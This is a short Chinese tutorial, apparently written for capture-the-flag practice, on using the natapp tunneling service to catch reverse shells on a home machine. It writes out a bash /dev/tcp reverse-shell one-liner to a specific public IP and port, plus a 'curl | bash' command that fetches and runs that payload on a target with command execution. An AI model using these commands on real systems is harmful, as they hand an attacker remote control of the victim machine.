有时候做题时懒得开服务器,或者服务器有问题用不了,都可以用本机做下内网穿透来进行反弹shell,或者得到一个公网可访问的web页面
我一般用natapp,使用起来比较简单方便
注册完成后配置下隧道本地要映射的端口
http隧道一般本地端口就设置为80,到时候本地开启phpstudy就可以直接使用。
tcp隧道根据你要监听的端口进行设置。
我这里tcp隧道的本地端口设置为1516。
下载它的客户端后直接在终端中执行命令
./natapp -authtoken=你的authtoken
可以得到映射后的地址和端口
然后进行本地监听即可
可以ping server.natappfree.cc,得到ip更方便
反弹shell命令
bash -i >& /dev/tcp/112.74.89.58/37838 0>&1
当然也可以利用curl配合web页面进行反弹shell
在win中打开phpstudy,然后复制http隧道的authtoken,运行客户端进行穿透
在php的web目录写入index.html
bash -i >& /dev/tcp/112.74.89.58/37838 0>&1
如果存在命令执行,就执行此命令
curl 795ggp.natappfree.cc | bash
即可反弹shell
